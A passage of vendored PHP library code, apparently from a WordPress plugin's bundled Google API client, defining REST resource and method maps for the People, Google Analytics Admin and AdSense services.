'searchDirectoryPeople' => ['path' => 'v1/people:searchDirectoryPeople', 'httpMethod' => 'GET', 'parameters' => ['mergeSources' => ['location' => 'query', 'type' => 'string', 'repeated' => \true], 'pageSize' => ['location' => 'query', 'type' => 'integer'], 'pageToken' => ['location' => 'query', 'type' => 'string'], 'query' => ['location' => 'query', 'type' => 'string'], 'readMask' => ['location' => 'query', 'type' => 'string'], 'sources' => ['location' => 'query', 'type' => 'string', 'repeated' => \true]]], 'updateContact' => ['path' => 'v1/{+resourceName}:updateContact', 'httpMethod' => 'PATCH', 'parameters' => ['resourceName' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'personFields' => ['location' => 'query', 'type' => 'string'], 'sources' => ['location' => 'query', 'type' => 'string', 'repeated' => \true], 'updatePersonFields' => ['location' => 'query', 'type' => 'string']]], 'updateContactPhoto' => ['path' => 'v1/{+resourceName}:updateContactPhoto', 'httpMethod' => 'PATCH', 'parameters' => ['resourceName' => ['location' => 'path', 'type' => 'string', 'required' => \true]]]]]); $this->people_connections = new \Google\Site_Kit_Dependencies\Google\Service\PeopleService\Resource\PeopleConnections($this, $this->serviceName, 'connections', ['methods' => ['list' => ['path' => 'v1/{+resourceName}/connections', 'httpMethod' => 'GET', 'parameters' => ['resourceName' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'pageSize' => ['location' => 'query', 'type' => 'integer'], 'pageToken' => ['location' => 'query', 'type' => 'string'], 'personFields' => ['location' => 'query', 'type' => 'string'], 'requestMask.includeField' => ['location' => 'query', 'type' => 'string'], 'requestSyncToken' => ['location' => 'query', 'type' => 'boolean'], 'sortOrder' => ['location' => 'query', 'type' => 'string'], 'sources' => ['location' => 'query', 'type' => 'string', 'repeated' => \true], 'syncToken' => ['location' => 'query', 'type' => 'string']]]]]); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PeopleService::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PeopleService'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service; use Google\Site_Kit_Dependencies\Google\Client; /** * Service definition for GoogleAnalyticsAdmin (v1beta). * * <p> * Manage properties in Google Analytics. Warning: Creating multiple Customer * Applications, Accounts, or Projects to simulate or act as a single Customer * Application, Account, or Project (respectively) or to circumvent Service- * specific usage limits or quotas is a direct violation of Google Cloud * Platform Terms of Service as well as Google APIs Terms of Service. These * actions can result in immediate termination of your GCP project(s) without * any warning.</p> * * <p> * For more information about this service, see the API * <a href="http://code.google.com/apis/analytics/docs/mgmt/home.html" target="_blank">Documentation</a> * </p> * * @author Google, Inc. */ class GoogleAnalyticsAdmin extends \Google\Site_Kit_Dependencies\Google\Service { /** Edit Google Analytics management entities. */ const ANALYTICS_EDIT = "https://www.googleapis.com/auth/analytics.edit"; /** See and download your Google Analytics data. */ const ANALYTICS_READONLY = "https://www.googleapis.com/auth/analytics.readonly"; public $accountSummaries; public $accounts; public $properties; public $properties_conversionEvents; public $properties_customDimensions; public $properties_customMetrics; public $properties_dataStreams; public $properties_dataStreams_measurementProtocolSecrets; public $properties_firebaseLinks; public $properties_googleAdsLinks; public $properties_keyEvents; public $rootUrlTemplate; /** * Constructs the internal representation of the GoogleAnalyticsAdmin service. * * @param Client|array $clientOrConfig The client used to deliver requests, or a * config array to pass to a new Client instance. * @param string $rootUrl The root URL used for requests to the service. */ public function __construct($clientOrConfig = [], $rootUrl = null) { parent::__construct($clientOrConfig); $this->rootUrl = $rootUrl ?: 'https://analyticsadmin.googleapis.com/'; $this->rootUrlTemplate = $rootUrl ?: 'https://analyticsadmin.UNIVERSE_DOMAIN/'; $this->servicePath = ''; $this->batchPath = 'batch'; $this->version = 'v1beta'; $this->serviceName = 'analyticsadmin'; $this->accountSummaries = new \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\Resource\AccountSummaries($this, $this->serviceName, 'accountSummaries', ['methods' => ['list' => ['path' => 'v1beta/accountSummaries', 'httpMethod' => 'GET', 'parameters' => ['pageSize' => ['location' => 'query', 'type' => 'integer'], 'pageToken' => ['location' => 'query', 'type' => 'string']]]]]); $this->accounts = new \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\Resource\Accounts($this, $this->serviceName, 'accounts', ['methods' => ['delete' => ['path' => 'v1beta/{+name}', 'httpMethod' => 'DELETE', 'parameters' => ['name' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'get' => ['path' => 'v1beta/{+name}', 'httpMethod' => 'GET', 'parameters' => ['name' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'getDataSharingSettings' => ['path' => 'v1beta/{+name}', 'httpMethod' => 'GET', 'parameters' => ['name' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'list' => ['path' => 'v1beta/accounts', 'httpMethod' => 'GET', 'parameters' => ['pageSize' => ['location' => 'query', 'type' => 'integer'], 'pageToken' => ['location' => 'query', 'type' => 'string'], 'showDeleted' => ['location' => 'query', 'type' => 'boolean']]], 'patch' => ['path' => 'v1beta/{+name}', 'httpMethod' => 'PATCH', 'parameters' => ['name' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'updateMask' => ['location' => 'query', 'type' => 'string']]], 'provisionAccountTicket' => ['path' => 'v1beta/accounts:provisionAccountTicket', 'httpMethod' => 'POST', 'parameters' => []], 'runAccessReport' => ['path' => 'v1beta/{+entity}:runAccessReport', 'httpMethod' => 'POST', 'parameters' => ['entity' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'searchChangeHistoryEvents' => ['path' => 'v1beta/{+account}:searchChangeHistoryEvents', 'httpMethod' => 'POST', 'parameters' => ['account' => ['location' => 'path', 'type' => 'string', 'required' => \true]]]]]); $this->properties = new \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\Resource\Properties($this, $this->serviceName, 'properties', ['methods' => ['acknowledgeUserDataCollection' => ['path' => 'v1beta/{+property}:acknowledgeUserDataCollection', 'httpMethod' => 'POST', 'parameters' => ['property' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'create' => ['path' => 'v1beta/properties', 'httpMethod' => 'POST', 'parameters' => []], 'delete' => ['path' => 'v1beta/{+name}', 'httpMethod' => 'DELETE', 'parameters' => ['name' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'get' => ['path' => 'v1beta/{+name}', 'httpMethod' => 'GET', 'parameters' => ['name' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'getDataRetentionSettings' => ['path' => 'v1beta/{+name}', 'httpMethod' => 'GET', 'parameters' => ['name' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'list' => ['path' => 'v1beta/properties', 'httpMethod' => 'GET', 'parameters' => ['filter' => ['location' => 'query', 'type' => 'string'], 'pageSize' => ['location' => 'query', 'type' => 'integer'], 'pageToken' => ['location' => 'query', 'type' => 'string'], 'showDeleted' => ['location' => 'query', 'type' => 'boolean']]], 'patch' => ['path' => 'v1beta/{+name}', 'httpMethod' => 'PATCH', 'parameters' => ['name' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'updateMask' => ['location' => 'query', 'type' => 'string']]], 'runAccessReport' => ['path' => 'v1beta/{+entity}:runAccessReport', 'httpMethod' => 'POST', 'parameters' => ['entity' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'updateDataRetentionSettings' => ['path' => 'v1beta/{+name}', 'httpMethod' => 'PATCH', 'parameters' => ['name' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'updateMask' => ['location' => 'query', 'type' => 'string']]]]]); $this->properties_conversionEvents = new \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\Resource\PropertiesConversionEvents($this, $this->serviceName, 'conversionEvents', ['methods' => ['create' => ['path' => 'v1beta/{+parent}/conversionEvents', 'httpMethod' => 'POST', 'parameters' => ['parent' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'delete' => ['path' => 'v1beta/{+name}', 'httpMethod' => 'DELETE', 'parameters' => ['name' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'get' => ['path' => 'v1beta/{+name}', 'httpMethod' => 'GET', 'parameters' => ['name' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'list' => ['path' => 'v1beta/{+parent}/conversionEvents', 'httpMethod' => 'GET', 'parameters' => ['parent' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'pageSize' => ['location' => 'query', 'type' => 'integer'], 'pageToken' => ['location' => 'query', 'type' => 'string']]], 'patch' => ['path' => 'v1beta/{+name}', 'httpMethod' => 'PATCH', 'parameters' => ['name' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'updateMask' => ['location' => 'query', 'type' => 'string']]]]]); $this->properties_customDimensions = new \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\Resource\PropertiesCustomDimensions($this, $this->serviceName, 'customDimensions', ['methods' => ['archive' => ['path' => 'v1beta/{+name}:archive', 'httpMethod' => 'POST', 'parameters' => ['name' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'create' => ['path' => 'v1beta/{+parent}/customDimensions', 'httpMethod' => 'POST', 'parameters' => ['parent' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'get' => ['path' => 'v1beta/{+name}', 'httpMethod' => 'GET', 'parameters' => ['name' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'list' => ['path' => 'v1beta/{+parent}/customDimensions', 'httpMethod' => 'GET', 'parameters' => ['parent' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'pageSize' => ['location' => 'query', 'type' => 'integer'], 'pageToken' => ['location' => 'query', 'type' => 'string']]], 'patch' => ['path' => 'v1beta/{+name}', 'httpMethod' => 'PATCH', 'parameters' => ['name' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'updateMask' => ['location' => 'query', 'type' => 'string']]]]]); $this->properties_customMetrics = new \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\Resource\PropertiesCustomMetrics($this, $this->serviceName, 'customMetrics', ['methods' => ['archive' => ['path' => 'v1beta/{+name}:archive', 'httpMethod' => 'POST', 'parameters' => ['name' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'create' => ['path' => 'v1beta/{+parent}/customMetrics', 'httpMethod' => 'POST', 'parameters' => ['parent' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'get' => ['path' => 'v1beta/{+name}', 'httpMethod' => 'GET', 'parameters' => ['name' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'list' => ['path' => 'v1beta/{+parent}/customMetrics', 'httpMethod' => 'GET', 'parameters' => ['parent' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'pageSize' => ['location' => 'query', 'type' => 'integer'], 'pageToken' => ['location' => 'query', 'type' => 'string']]], 'patch' => ['path' => 'v1beta/{+name}', 'httpMethod' => 'PATCH', 'parameters' => ['name' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'updateMask' => ['location' => 'query', 'type' => 'string']]]]]); $this->properties_dataStreams = new \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\Resource\PropertiesDataStreams($this, $this->serviceName, 'dataStreams', ['methods' => ['create' => ['path' => 'v1beta/{+parent}/dataStreams', 'httpMethod' => 'POST', 'parameters' => ['parent' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'delete' => ['path' => 'v1beta/{+name}', 'httpMethod' => 'DELETE', 'parameters' => ['name' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'get' => ['path' => 'v1beta/{+name}', 'httpMethod' => 'GET', 'parameters' => ['name' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'list' => ['path' => 'v1beta/{+parent}/dataStreams', 'httpMethod' => 'GET', 'parameters' => ['parent' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'pageSize' => ['location' => 'query', 'type' => 'integer'], 'pageToken' => ['location' => 'query', 'type' => 'string']]], 'patch' => ['path' => 'v1beta/{+name}', 'httpMethod' => 'PATCH', 'parameters' => ['name' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'updateMask' => ['location' => 'query', 'type' => 'string']]]]]); $this->properties_dataStreams_measurementProtocolSecrets = new \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\Resource\PropertiesDataStreamsMeasurementProtocolSecrets($this, $this->serviceName, 'measurementProtocolSecrets', ['methods' => ['create' => ['path' => 'v1beta/{+parent}/measurementProtocolSecrets', 'httpMethod' => 'POST', 'parameters' => ['parent' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'delete' => ['path' => 'v1beta/{+name}', 'httpMethod' => 'DELETE', 'parameters' => ['name' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'get' => ['path' => 'v1beta/{+name}', 'httpMethod' => 'GET', 'parameters' => ['name' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'list' => ['path' => 'v1beta/{+parent}/measurementProtocolSecrets', 'httpMethod' => 'GET', 'parameters' => ['parent' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'pageSize' => ['location' => 'query', 'type' => 'integer'], 'pageToken' => ['location' => 'query', 'type' => 'string']]], 'patch' => ['path' => 'v1beta/{+name}', 'httpMethod' => 'PATCH', 'parameters' => ['name' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'updateMask' => ['location' => 'query', 'type' => 'string']]]]]); $this->properties_firebaseLinks = new \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\Resource\PropertiesFirebaseLinks($this, $this->serviceName, 'firebaseLinks', ['methods' => ['create' => ['path' => 'v1beta/{+parent}/firebaseLinks', 'httpMethod' => 'POST', 'parameters' => ['parent' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'delete' => ['path' => 'v1beta/{+name}', 'httpMethod' => 'DELETE', 'parameters' => ['name' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'list' => ['path' => 'v1beta/{+parent}/firebaseLinks', 'httpMethod' => 'GET', 'parameters' => ['parent' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'pageSize' => ['location' => 'query', 'type' => 'integer'], 'pageToken' => ['location' => 'query', 'type' => 'string']]]]]); $this->properties_googleAdsLinks = new \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\Resource\PropertiesGoogleAdsLinks($this, $this->serviceName, 'googleAdsLinks', ['methods' => ['create' => ['path' => 'v1beta/{+parent}/googleAdsLinks', 'httpMethod' => 'POST', 'parameters' => ['parent' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'delete' => ['path' => 'v1beta/{+name}', 'httpMethod' => 'DELETE', 'parameters' => ['name' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'list' => ['path' => 'v1beta/{+parent}/googleAdsLinks', 'httpMethod' => 'GET', 'parameters' => ['parent' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'pageSize' => ['location' => 'query', 'type' => 'integer'], 'pageToken' => ['location' => 'query', 'type' => 'string']]], 'patch' => ['path' => 'v1beta/{+name}', 'httpMethod' => 'PATCH', 'parameters' => ['name' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'updateMask' => ['location' => 'query', 'type' => 'string']]]]]); $this->properties_keyEvents = new \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\Resource\PropertiesKeyEvents($this, $this->serviceName, 'keyEvents', ['methods' => ['create' => ['path' => 'v1beta/{+parent}/keyEvents', 'httpMethod' => 'POST', 'parameters' => ['parent' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'delete' => ['path' => 'v1beta/{+name}', 'httpMethod' => 'DELETE', 'parameters' => ['name' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'get' => ['path' => 'v1beta/{+name}', 'httpMethod' => 'GET', 'parameters' => ['name' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'list' => ['path' => 'v1beta/{+parent}/keyEvents', 'httpMethod' => 'GET', 'parameters' => ['parent' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'pageSize' => ['location' => 'query', 'type' => 'integer'], 'pageToken' => ['location' => 'query', 'type' => 'string']]], 'patch' => ['path' => 'v1beta/{+name}', 'httpMethod' => 'PATCH', 'parameters' => ['name' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'updateMask' => ['location' => 'query', 'type' => 'string']]]]]); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service; use Google\Site_Kit_Dependencies\Google\Client; /** * Service definition for Adsense (v2). * * <p> * The AdSense Management API allows publishers to access their inventory and * run earnings and performance reports.</p> * * <p> * For more information about this service, see the API * <a href="https://developers.google.com/adsense/management/" target="_blank">Documentation</a> * </p> * * @author Google, Inc. */ class Adsense extends \Google\Site_Kit_Dependencies\Google\Service { /** View and manage your AdSense data. */ const ADSENSE = "https://www.googleapis.com/auth/adsense"; /** View your AdSense data. */ const ADSENSE_READONLY = "https://www.googleapis.com/auth/adsense.readonly"; public $accounts; public $accounts_adclients; public $accounts_adclients_adunits; public $accounts_adclients_customchannels; public $accounts_adclients_urlchannels; public $accounts_alerts; public $accounts_payments; public $accounts_policyIssues; public $accounts_reports; public $accounts_reports_saved; public $accounts_sites; public $rootUrlTemplate; /** * Constructs the internal representation of the Adsense service. * * @param Client|array $clientOrConfig The client used to deliver requests, or a * config array to pass to a new Client instance. * @param string $rootUrl The root URL used for requests to the service. */ public function __construct($clientOrConfig = [], $rootUrl = null) { parent::__construct($clientOrConfig); $this->rootUrl = $rootUrl ?: 'https://adsense.googleapis.com/'; $this->rootUrlTemplate = $rootUrl ?: 'https://adsense.UNIVERSE_DOMAIN/'; $this->servicePath = ''; $this->batchPath = 'batch'; $this->version = 'v2'; $this->serviceName = 'adsense'; $this->accounts = new \Google\Site_Kit_Dependencies\Google\Service\Adsense\Resource\Accounts($this, $this->serviceName, 'accounts', ['methods' => ['get' => ['path' => 'v2/{+name}', 'httpMethod' => 'GET', 'parameters' => ['name' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'getAdBlockingRecoveryTag' => ['path' => 'v2/{+name}/adBlockingRecoveryTag', 'httpMethod' => 'GET', 'parameters' => ['name' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'list' => ['path' => 'v2/accounts', 'httpMethod' => 'GET', 'parameters' => ['pageSize' => ['location' => 'query', 'type' => 'integer'], 'pageToken' => ['location' => 'query', 'type' => 'string']]], 'listChildAccounts' => ['path' => 'v2/{+parent}:listChildAccounts', 'httpMethod' => 'GET', 'parameters' => ['parent' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'pageSize' => ['location' => 'query', 'type' => 'integer'], 'pageToken' => ['location' => 'query', 'type' => 'string']]]]]); $this->accounts_adclients = new \Google\Site_Kit_Dependencies\Google\Service\Adsense\Resource\AccountsAdclients($this, $this->serviceName, 'adclients', ['methods' => ['get' => ['path' => 'v2/{+name}', 'httpMethod' => 'GET', 'parameters' => ['name' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'getAdcode' => ['path' => 'v2/{+name}/adcode', 'httpMethod' => 'GET', 'parameters' => ['name' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'list' => ['path' => 'v2/{+parent}/adclients', 'httpMethod' => 'GET', 'parameters' => ['parent' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'pageSize' => ['location' => 'query', 'type' => 'integer'], 'pageToken' => ['location' => 'query', 'type' => 'string']]]]]); $this->accounts_adclients_adunits = new \Google\Site_Kit_Dependencies\Google\Service\Adsense\Resource\AccountsAdclientsAdunits($this, $this->serviceName, 'adunits', ['methods' => ['create' => ['path' => 'v2/{+parent}/adunits', 'httpMethod' => 'POST', 'parameters' => ['parent' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'get' => ['path' => 'v2/{+name}', 'httpMethod' => 'GET', 'parameters' => ['name' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'getAdcode' => ['path' => 'v2/{+name}/adcode', 'httpMethod' => 'GET', 'parameters' => ['name' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'list' => ['path' => 'v2/{+parent}/adunits', 'httpMethod' => 'GET', 'parameters' => ['parent' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'pageSize' => ['location' => 'query', 'type' => 'integer'], 'pageToken' => ['location' => 'query', 'type' => 'string']]], 'listLinkedCustomChannels' => ['path' => 'v2/{+parent}:listLinkedCustomChannels', 'httpMethod' => 'GET', 'parameters' => ['parent' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'pageSize' => ['location' => 'query', 'type' => 'integer'], 'pageToken' => ['location' => 'query', 'type' => 'string']]], 'patch' => ['path' => 'v2/{+name}', 'httpMethod' => 'PATCH', 'parameters' => ['name' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'updateMask' => ['location' => 'query', 'type' => 'string']]]]]); $this->accounts_adclients_customchannels = new \Google\Site_Kit_Dependencies\Google\Service\Adsense\Resource\AccountsAdclientsCustomchannels($this, $this->serviceName, 'customchannels', ['methods' => ['create' => ['path' => 'v2/{+parent}/customchannels', 'httpMethod' => 'POST', 'parameters' => ['parent' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'delete' => ['path' => 'v2/{+name}', 'httpMethod' => 'DELETE', 'parameters' => ['name' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'get' => ['path' => 'v2/{+name}', 'httpMethod' => 'GET', 'parameters' => ['name' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'list' => ['path' => 'v2/{+parent}/customchannels', 'httpMethod' => 'GET', 'parameters' => ['parent' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'pageSize' => ['location' => 'query', 'type' => 'integer'], 'pageToken' => ['location' => 'query', 'type' => 'string']]], 'listLinkedAdUnits' => ['path' => 'v2/{+parent}:listLinkedAdUnits', 'httpMethod' => 'GET', 'parameters' => ['parent' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'pageSize' => ['location' => 'query', 'type' => 'integer'], 'pageToken' => ['location' => 'query', 'type' => 'string']]], 'patch' => ['path' => 'v2/{+name}', 'httpMethod' => 'PATCH', 'parameters' => ['name' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'updateMask' => ['location' => 'query', 'type' => 'string']]]]]); $this->accounts_adclients_urlchannels = new \Google\Site_Kit_Dependencies\Google\Service\Adsense\Resource\AccountsAdclientsUrlchannels($this, $this->serviceName, 'urlchannels', ['methods' => ['get' => ['path' => 'v2/{+name}', 'httpMethod' => 'GET', 'parameters' => ['name' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'list' => ['path' => 'v2/{+parent}/urlchannels', 'httpMethod' => 'GET', 'parameters' => ['parent' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'pageSize' => ['location' => 'query', 'type' => 'integer'], 'pageToken' => ['location' => 'query', 'type' => 'string']]]]]); $this->accounts_alerts = new \Google\Site_Kit_Dependencies\Google\Service\Adsense\Resource\AccountsAlerts($this, $this->serviceName, 'alerts', ['methods' => ['list' => ['path' => 'v2/{+parent}/alerts', 'httpMethod' => 'GET', 'parameters' => ['parent' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'languageCode' => ['location' => 'query', 'type' => 'string']]]]]); $this->accounts_payments = new \Google\Site_Kit_Dependencies\Google\Service\Adsense\Resource\AccountsPayments($this, $this->serviceName, 'payments', ['methods' => ['list' => ['path' => 'v2/{+parent}/payments', 'httpMethod' => 'GET', 'parameters' => ['parent' => ['location' => 'path', 'type' => 'string', 'required' => \true]]]]]); $this->accounts_policyIssues = new \Google\Site_Kit_Dependencies\Google\Service\Adsense\Resource\AccountsPolicyIssues($this, $this->serviceName, 'policyIssues', ['methods' => ['get' => ['path' => 'v2/{+name}', 'httpMethod' => 'GET', 'parameters' => ['name' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'list' => ['path' => 'v2/{+parent}/policyIssues', 'httpMethod' => 'GET', 'parameters' => ['parent' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'pageSize' => ['location' => 'query', 'type' => 'integer'], 'pageToken' => ['location' => 'query', 'type' => 'string']]]]]); $this->accounts_reports = new \Google\Site_Kit_Dependencies\Google\Service\Adsense\Resource\AccountsReports($this, $this->serviceName, 'reports', ['methods' => ['generate' => ['path' => 'v2/{+account}/reports:generate', 'httpMethod' => 'GET', 'parameters' => ['account' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'currencyCode' => ['location' => 'query', 'type' => 'string'], 'dateRange' => ['location' => 'query', 'type' => 'string'], 'dimensions' => ['location' => 'query', 'type' => 'string', 'repeated' => \true], 'endDate.day' => ['location' => 'query', 'type' => 'integer'], 'endDate.month' => ['location' => 'query', 'type' => 'integer'], 'endDate.year' => ['location' => 'query', 'type' => 'integer'], 'filters' => ['location' => 'query', 'type' => 'string', 'repeated' => \true], 'languageCode' => ['location' => 'query', 'type' => 'string'], 'limit' => ['location' => 'query', 'type' => 'integer'], 'metrics' => ['location' => 'query', 'type' => 'string', 'repeated' => \true], 'orderBy' => ['location' => 'query', 'type' => 'string', 'repeated' => \true], 'reportingTimeZone' => ['location' => 'query', 'type' => 'string'], 'startDate.day' => ['location' => 'query', 'type' => 'integer'], 'startDate.month' => ['location' => 'query', 'type' => 'integer'], 'startDate.year' => ['location' => 'query', 'type' => 'integer']]], 'generateCsv' => ['path' => 'v2/{+account}/reports:generateCsv', 'httpMethod' => 'GET', 'parameters' => ['account' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'currencyCode' => ['location' => 'query', 'type' => 'string'], 'dateRange' => ['location' => 'query', 'type' => 'string'], 'dimensions' => ['location' => 'query', 'type' => 'string', 'repeated' => \true], 'endDate.day' => ['location' => 'query', 'type' => 'integer'], 'endDate.month' => ['location' => 'query', 'type' => 'integer'], 'endDate.year' => ['location' => 'query', 'type' => 'integer'], 'filters' => ['location' => 'query', 'type' => 'string', 'repeated' => \true], 'languageCode' => ['location' => 'query', 'type' => 'string'], 'limit' => ['location' => 'query', 'type' => 'integer'], 'metrics' => ['location' => 'query', 'type' => 'string', 'repeated' => \true], 'orderBy' => ['location' => 'query', 'type' => 'string', 'repeated' => \true], 'reportingTimeZone' => ['location' => 'query', 'type' => 'string'], 'startDate.day' => ['location' => 'query', 'type' => 'integer'], 'startDate.month' => ['location' => 'query', 'type' => 'integer'], 'startDate.year' => ['location' => 'query', 'type' => 'integer']]], 'getSaved' => ['path' => 'v2/{+name}/saved', 'httpMethod' => 'GET', 'parameters' => ['name' => ['location' => 'path', 'type' => 'string', 'required' => \true]]]]]); $this->accounts_reports_saved = new \Google\Site_Kit_Dependencies\Google\Service\Adsense\Resource\AccountsReportsSaved($this, $this->serviceName, 'saved', ['methods' => ['generate' => ['path' => 'v2/{+name}/saved:generate', 'httpMethod' => 'GET', 'parameters' => ['name' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'currencyCode' => ['location' => 'query', 'type' => 'string'], 'dateRange' => ['location' => 'query', 'type' => 'string'], 'endDate.day' => ['location' => 'query', 'type' => 'integer'], 'endDate.month' => ['location' => 'query', 'type' => 'integer'], 'endDate.year' => ['location' => 'query', 'type' => 'integer'], 'languageCode' => ['location' => 'query', 'type' => 'string'], 'reportingTimeZone' => ['location' => 'query', 'type' => 'string'], 'startDate.day' => ['location' => 'query', 'type' => 'integer'], 'startDate.month' => ['location' => 'query', 'type' => 'integer'], 'startDate.year' => ['location' => 'query', 'type' => 'integer']]], 'generateCsv' => ['path' => 'v2/{+name}/saved:generateCsv', 'httpMethod' => 'GET', 'parameters' => ['name' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'currencyCode' => ['location' => 'query', 'type' => 'string'], 'dateRange' => ['location' => 'query', 'type' => 'string'], 'endDate.day' => ['location' => 'query', 'type' => 'integer'], 'endDate.month' => ['location' => 'query', 'type' => 'integer'], 'endDate.year' => ['location' => 'query', 'type' => 'integer'], 'languageCode' => ['location' => 'query', 'type' => 'string'], 'reportingTimeZone' => ['location' => 'query', 'type' => 'string'], 'startDate.day' => ['location' => 'query', 'type' => 'integer'], 'startDate.month' => ['location' => 'query', 'type' => 'integer'], 'startDate.year' => ['location' => 'query', 'type' => 'integer']]], 'list' => ['path' => 'v2/{+parent}/reports/saved', 'httpMethod' => 'GET', 'parameters' => ['parent' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'pageSize' => ['location' => 'query', 'type' => 'integer'], 'pageToken' => ['location' => 'query', 'type' => 'string']]]]]); $this->accounts_sites = new \Google\Site_Kit_Dependencies\Google\Service\Adsense\Resource\AccountsSites($this, $this->serviceName, 'sites', ['methods' => ['get' => ['path' => 'v2/{+name}', 'httpMethod' => 'GET', 'parameters' => ['name' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'list' => ['path' => 